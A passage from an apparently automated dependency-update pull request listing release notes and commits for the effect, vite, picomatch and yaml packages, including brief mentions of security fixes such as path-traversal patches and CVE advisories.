\u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.16\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6018\"\u003e#6018\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/e71889f35b081d13b7da2c04d2f81d6933056b49\"\u003e\u003ccode\u003ee71889f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/codewithkenzo\"\u003e\u003ccode\u003e@​codewithkenzo\u003c/code\u003e\u003c/a\u003e! - fix(Match): handle null/undefined in \u003ccode\u003eMatch.tag\u003c/code\u003e and \u003ccode\u003eMatch.tagStartsWith\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eAdded null checks to \u003ccode\u003ediscriminator\u003c/code\u003e and \u003ccode\u003ediscriminatorStartsWith\u003c/code\u003e predicates to prevent crashes when matching nullable union types.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/aa473938a53d07837e84935329f4891a7d591c3b\"\u003e\u003ccode\u003eaa47393\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6089\"\u003e#6089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e fix(effect): isolate scheduler runners per fiber (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6124\"\u003e#6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6107\"\u003e#6107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Backport: Fix TupleWithRest post-rest index drift validation bug (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6097\"\u003e#6097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e fix(Schema): handle Transformation in getIndexSignatures for correct omit beh...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Schema: fix getPropertySignatures crash on Struct with optionalWith({ default...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/ab3b64c20a039eb4d573fe757c41278925b22687\"\u003e\u003ccode\u003eab3b64c\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6080\"\u003e#6080\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e fix semaphore race condition where permits could be leaked (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6081\"\u003e#6081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e build ManagedRuntime synchronously if possible (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6079\"\u003e#6079\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4f2107548fa64c21a8643b7b0efcd556cd16d4b9\"\u003e\u003ccode\u003e4f21075\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6063\"\u003e#6063\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Effect-TS/effect/commits/effect@3.20.0/packages/effect\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.2.0 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yaml` from 2.8.1 to 2.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eemeli/yaml/releases\"\u003eyaml's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.9.0\u003c/h2\u003e\n\u003cp\u003eThe changes here are really only patches, but I'm releasing this as a minor version to note a small change to the documentation of \u003ccode\u003eparseDocument()\u003c/code\u003e and \u003ccode\u003eparseAllDocuments()\u003c/code\u003e: I've removed the claim that they'll \u0026quot;never throw\u0026quot;.\u003c/p\u003e\n\u003cp\u003eIt remains the case that practically all non-malicious inputs will be handled without emitting an error, but there is a decent chance that code paths remain where e.g. a RangeError due to call stack exhaustion can be triggered by malicious inputs. Up to now, I've considered these as security vulnerabilities, and in fact it's the only category of error for which \u003ccode\u003eyaml\u003c/code\u003e CVEs have been issued so far.\u003c/p\u003e\n\u003cp\u003eStarting from this release, I'll be considering such errors as bugs, but not vulnerabilities. I do welcome people and/or LLMs looking for them, but please report them as normal issues rather than suspected security vulnerabilities. This also applies to previously undiscovered bugs in earlier releases.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix: Avoid calling \u003ccode\u003eArray.prototype.push.apply()\u003c/code\u003e with large source array\u003c/li\u003e\n\u003cli\u003efix(lexer): Avoid recursive calls that may exhaust the call stack\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDisable alias resolution with \u003ccode\u003emaxAliasCount:0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/677\"\u003e#677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle invalid unicode escapes (e1a1a77)\u003c/li\u003e\n\u003cli\u003eApply \u003ccode\u003eminFractionDigits\u003c/code\u003e only to decimal strings (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/676\"\u003e#676\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003etrailingComma\u003c/code\u003e ToString option for multiline flow formatting (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCatch stack overflow during node composition (1e84ebb)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSerialize -0 as -0 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/638\"\u003e#638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not double newlines for empty map values (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/642\"\u003e#642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/ddb21b04cb889722cec8f89dc1b67f19d62d7f7d\"\u003e\u003ccode\u003eddb21b0\u003c/code\u003e\u003c/a\u003e 2.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/167365befdae1f03d53d47a8c6533140a9d48a75\"\u003e\u003ccode\u003e167365b\u003c/code\u003e\u003c/a\u003e docs: Clarify that not all errors can be avoided\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/6eca2a7087548f86c4edb6a7cf2cdfe548759f06\"\u003e\u003ccode\u003e6eca2a7\u003c/code\u003e\u003c/a\u003e fix: Avoid calling Array.prototype.push.apply() with large source array\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/0543cd57fd61ea15a58e9f0ec2064b8b408177d8\"\u003e\u003ccode\u003e0543cd5\u003c/code\u003e\u003c/a\u003e fix(lexer): Avoid recursive calls that may exhaust the call stack\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/ccdf7439587544f64223429498a1d9ec514eaac1\"\u003e\u003ccode\u003eccdf743\u003c/code\u003e\u003c/a\u003e 2.8.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/f625789dbd971c936ff66fe5c49e368062ae7b41\"\u003e\u003ccode\u003ef625789\u003c/code\u003e\u003c/a\u003e fix: Disable alias resolution with maxAliasCount:0 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/677\"\u003e#677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/e1a1a7735ff2e9717b87af36795bcd280f85f55d\"\u003e\u003ccode\u003ee1a1a77\u003c/code\u003e\u003c/a\u003e fix: Handle invalid unicode escapes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a163ea009c57ab9f1054ca39b24b6ef4c1e9fdbe\"\u003e\u003ccode\u003ea163ea0\u003c/code\u003e\u003c/a\u003e style: Satify Prettier\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/b2a5a6c615673056917aaa04d657802945e81425\"\u003e\u003ccode\u003eb2a5a6c\u003c/code\u003e\u003c/a\u003e fix: Apply minFractionDigits only to decimal strings (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/676\"\u003e#676\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/93c951b3478b4bb061d7b5227fd64f46d3f9df7f\"\u003e\u003ccode\u003e93c951b\u003c/code\u003e\u003c/a\u003e chore: Bump JSR version to v2.8.3 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/673\"\u003e#673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eemeli/yaml/compare/v2.8.1...v2.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.1.7 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for 